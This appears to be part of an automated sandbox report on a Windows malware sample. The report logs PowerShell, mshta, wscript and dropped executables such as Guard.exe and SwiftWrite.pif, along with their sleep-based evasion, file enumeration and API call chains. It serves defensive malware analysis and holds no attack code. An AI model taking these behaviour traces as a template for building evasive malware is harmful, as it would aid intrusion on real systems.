Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2170Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 889Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6136Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3615Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2685
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]Jump to dropped file
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_30-99595
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeAPI coverage: 3.6 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2056Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 5633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF656D2C7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2B7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D371F4 FindFirstFileW,FindClose,19_2_00007FF656D371F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D372A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF656D372A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D2BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF656D2BC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF656D3A874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D36428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF656D36428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D3A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF656D3A4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2F50 FindFirstFileExW,19_2_00007FF656CF2F50
